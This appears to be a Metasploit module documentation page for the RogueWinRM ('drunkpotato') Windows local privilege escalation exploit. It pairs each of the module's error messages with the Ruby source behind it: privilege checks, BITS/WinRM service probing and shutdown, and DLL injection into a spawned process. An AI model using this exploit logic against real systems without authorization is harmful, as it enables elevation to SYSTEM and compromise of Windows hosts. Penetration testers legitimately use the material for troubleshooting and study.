Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Operating system: <OS>
Here is a relevant code snippet related to the "Operating system: <OS>" error message:
154: privs = client.sys.config.getprivs
155: os = client.sys.config.sysinfo['OS']
156:
157: # Fast fails
158: if os.include?('Windows 7') || os.include?('Windows XP')
159: print_bad("Operating system: #{os}")
160: print_bad('BITS behavior on Windows 7 and previous has not been shown vulnerable.')
161: return Exploit::CheckCode::Safe
162: end
163:
164: unless privs.include?('SeImpersonatePrivilege') || privs.include?('SeAssignPrimaryTokenPrivilege')
BITS behavior on Windows 7 and previous has not been shown vulnerable.
Here is a relevant code snippet related to the "BITS behavior on Windows 7 and previous has not been shown vulnerable." error message:
155: os = client.sys.config.sysinfo['OS']
156:
157: # Fast fails
158: if os.include?('Windows 7') || os.include?('Windows XP')
159: print_bad("Operating system: #{os}")
160: print_bad('BITS behavior on Windows 7 and previous has not been shown vulnerable.')
161: return Exploit::CheckCode::Safe
162: end
163:
164: unless privs.include?('SeImpersonatePrivilege') || privs.include?('SeAssignPrimaryTokenPrivilege')
165: print_bad('Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.')
Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.
Here is a relevant code snippet related to the "Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege." error message:
160: print_bad('BITS behavior on Windows 7 and previous has not been shown vulnerable.')
161: return Exploit::CheckCode::Safe
162: end
163:
164: unless privs.include?('SeImpersonatePrivilege') || privs.include?('SeAssignPrimaryTokenPrivilege')
165: print_bad('Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.')
166: return Exploit::CheckCode::Safe
167: end
168: vprint_good('Target session has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.')
169:
170: running_services_code = check_bits_and_winrm
WinRM is running. Target is not exploitable.
Here is a relevant code snippet related to the "WinRM is running. Target is not exploitable." error message:
178: shutdown_service(running_services_code)
179: sleep(2)
180: running_services_code = check_bits_and_winrm
181: end
182: if [WINRM, WINRM + BITS].include?(running_services_code)
183: print_bad('WinRM is running. Target is not exploitable.')
184: return Exploit::CheckCode::Safe
185: elsif running_services_code == BITS
186: if should_services_be_shutdown
187: print_warning('Failed to shutdown BITS.')
188: end
Failed to shutdown BITS.
Here is a relevant code snippet related to the "Failed to shutdown BITS." error message:
182: if [WINRM, WINRM + BITS].include?(running_services_code)
183: print_bad('WinRM is running. Target is not exploitable.')
184: return Exploit::CheckCode::Safe
185: elsif running_services_code == BITS
186: if should_services_be_shutdown
187: print_warning('Failed to shutdown BITS.')
188: end
189: print_warning('BITS is running. Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
190: end
191: end
192:
BITS is running. Don't panic, the exploit should handle this, but you have to wait for BITS to terminate.
Here is a relevant code snippet related to the "BITS is running. Don't panic, the exploit should handle this, but you have to wait for BITS to terminate." error message:
184: return Exploit::CheckCode::Safe
185: elsif running_services_code == BITS
186: if should_services_be_shutdown
187: print_warning('Failed to shutdown BITS.')
188: end
189: print_warning('BITS is running. Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
190: end
191: end
192:
193: if is_system?
194: print_bad('Session is already elevated.')
Session is already elevated.
Here is a relevant code snippet related to the "Session is already elevated." error message:
189: print_warning('BITS is running. Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
190: end
191: end
192:
193: if is_system?
194: print_bad('Session is already elevated.')
195: return Exploit::CheckCode::Safe
196: end
197:
198: vprint_good('Session is not (yet) System.')
199: Exploit::CheckCode::Appears
Failed to retrieve infos about WinRM and BITS. Access is denied.
Here is a relevant code snippet related to the "Failed to retrieve infos about WinRM and BITS. Access is denied." error message:
209: check_command = 'powershell.exe Get-Service -Name BITS,WinRM'
210: result = cmd_exec(check_command)
211: vprint_status('Checking if BITS and WinRM are stopped...')
212:
213: if result.include?('~~')
214: print_bad('Failed to retrieve infos about WinRM and BITS. Access is denied.')
215: return -1
216: end
217:
218: if result.include?('Stopped BITS') && result.include?('Stopped WinRM')
219: print_good('BITS and WinRM are stopped.')
BITS is currently running. It must be down for the exploit to succeed.
Here is a relevant code snippet related to the "BITS is currently running. It must be down for the exploit to succeed." error message:
219: print_good('BITS and WinRM are stopped.')
220: return 0
221: end
222:
223: if result.include?('Running BITS') && result.include?('Stopped WinRM')
224: print_warning('BITS is currently running. It must be down for the exploit to succeed.')
225: return BITS
226: end
227:
228: if result.include?('Stopped BITS') && result.include?('Running WinRM')
229: print_warning('WinRM is currently running. It must be down for the exploit to succeed.')
WinRM is currently running. It must be down for the exploit to succeed.
Here is a relevant code snippet related to the "WinRM is currently running. It must be down for the exploit to succeed." error message:
224: print_warning('BITS is currently running. It must be down for the exploit to succeed.')
225: return BITS
226: end
227:
228: if result.include?('Stopped BITS') && result.include?('Running WinRM')
229: print_warning('WinRM is currently running. It must be down for the exploit to succeed.')
230: return WINRM
231: end
232:
233: if result.include?('Running BITS') && result.include?('Running WinRM')
234: print_warning('BITS and WinRM are currently running. They must be down for the exploit to succeed.')
BITS and WinRM are currently running. They must be down for the exploit to succeed.
Here is a relevant code snippet related to the "BITS and WinRM are currently running. They must be down for the exploit to succeed." error message:
229: print_warning('WinRM is currently running. It must be down for the exploit to succeed.')
230: return WINRM
231: end
232:
233: if result.include?('Running BITS') && result.include?('Running WinRM')
234: print_warning('BITS and WinRM are currently running. They must be down for the exploit to succeed.')
235: return BITS + WINRM
236: end
237: end
238:
239: #
Unknown target arch; unable to assign exploit code
Here is a relevant code snippet related to the "Unknown target arch; unable to assign exploit code" error message:
259: vprint_status('Assigning payload drunkpotato.x64.dll')
260: elsif payload_arch.first == ARCH_X86
261: dll_file_name = 'drunkpotato.x86.dll'
262: vprint_status('Assigning payload drunkpotato.x86.dll')
263: else
264: fail_with(Failure::BadConfig, 'Unknown target arch; unable to assign exploit code')
265: end
266: library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'drunkpotato', dll_file_name)
267: library_path = ::File.expand_path(library_path)
268:
269: print_status('Launching notepad to host the exploit...')
Operation failed. Trying to elevate the current process...
Here is a relevant code snippet related to the "Operation failed. Trying to elevate the current process..." error message:
277: process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
278: print_good("Process #{process.pid} launched.")
279: rescue Rex::Post::Meterpreter::RequestError
280: # Reader Sandbox won't allow to create a new process:
281: # stdapi_sys_process_execute: Operation failed: Access is denied.
282: print_error('Operation failed. Trying to elevate the current process...')
283: process = client.sys.process.open
284: end
285:
286: print_status("Injecting exploit into #{process.pid}...")
287: exploit_mem, offset = inject_dll_into_process(process, library_path)
Go back to menu.
Related Pull Requests
- #15575 Merged Pull Request: Update Gemfile.lock
- #15556 Merged Pull Request: Add shell support to enum_unattended module
- #15564 Merged Pull Request: Update post_common mixin methods to support powershell session type
- #15570 Merged Pull Request: Fix smb enum gpp module
- #15546 Merged Pull Request: Fix #15480, fix IgnoreUnknownPayloads for stageless reverse_http payloads
- #15561 Merged Pull Request: Add an exploit for ProxyShell
- #15525 Merged Pull Request: Add Lucee Administrator CVE-2021-21307 exploit
- #15332 Merged Pull Request: fix a localization issue and some other minor issues in
rename_file
method - #15540 Merged Pull Request: Add option for running
cmd_execute
in a subshell - #15303 Merged Pull Request: Fix
dir
method for windows shell sessions
References
- CVE: Not available
- https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/
- https://github.com/antonioCoco/RogueWinRM
See Also
Check also the following modules related to this module:
- exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
- exploit/windows/local/tokenmagic
- exploit/linux/proxy/squid_ntlm_authenticate
- exploit/linux/local/ptrace_sudo_token_priv_esc
- exploit/multi/http/apache_apisix_api_default_token_rce
- exploit/unix/http/laravel_token_unserialize_exec
- auxiliary/admin/mssql/mssql_ntlm_stealer
- auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
- auxiliary/admin/oracle/ora_ntlm_stealer
- auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
- auxiliary/scanner/http/ntlm_info_enumeration
- auxiliary/scanner/smtp/smtp_ntlm_domain
- auxiliary/server/capture/http_ntlm
- auxiliary/server/http_ntlmrelay
- auxiliary/admin/vmware/vcenter_forge_saml_token
- post/windows/gather/enum_domain_tokens
- post/windows/gather/enum_tokens
Authors
- Cassandre
- Andrea Pierini (decoder)
- Antonio Cocomazzi (splinter_code)
- Roberto (0xea31)
Version
This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.